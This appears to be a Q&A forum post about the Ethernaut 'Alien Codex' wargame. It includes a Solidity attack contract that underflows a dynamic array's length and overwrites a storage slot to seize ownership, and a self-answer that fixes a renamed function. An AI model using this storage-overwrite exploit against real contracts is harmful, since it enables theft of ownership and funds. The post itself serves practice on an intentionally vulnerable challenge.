# Ethernaut Alien Codex Gas Estimation Failed

Tags: solidity, remix, security, storage, openzeppelin

When i call `attack()` or `exploit()` function the remix shows Gas Estimation Failed. The code is copied from existing solution available on internet. so code is correct, can someone please help me why I am getting the **Gas Estimation Failed** popup window on Remix, and when I force the transaction it failed!

Any help appreciated thanks!

```
// SPDX-License-Identifier: MIT

pragma solidity ^0.8;

interface IAlienCodex {
    function owner() external view returns (address);
    function codex(uint256) external view returns (bytes32);
    function retract() external;
    function make_contact() external;
    function revise(uint256 i, bytes32 _content) external;
}

contract Hack {
    function attack(IAlienCodex target) external  {
        target.make_contact();
        target.retract();

        uint256 h = uint256(keccak256(abi.encode(uint256(1))));
        uint256 i;
        unchecked {
            // h + i = 0 = 2**256
            i -= h;
        }

        target.revise(i, bytes32(uint256(uint160(msg.sender))));
        require(target.owner() == msg.sender, "hack failed");
    }

    function exploit (IAlienCodex target) external {
        uint index = ((2 ** 256) - 1) - uint(keccak256(abi.encode(1))) + 1;
        bytes32 myAddress = bytes32(uint256(uint160(tx.origin)));
        target.make_contact();
        target.retract();
        target.revise(index, myAddress);
    }
}
```

Answer (score 1):

Oh my bad got my mistake, actually in ethernaut solution available on internet has `make_contact()` function where as in updated ethernaut challenge it's `makeContact()` so in interface that is declared in code above should have `makeContact()` instead of `make_contact()`, it's a silly mistake, but anyone whoever got stuck in the challenge this might be the possible reason.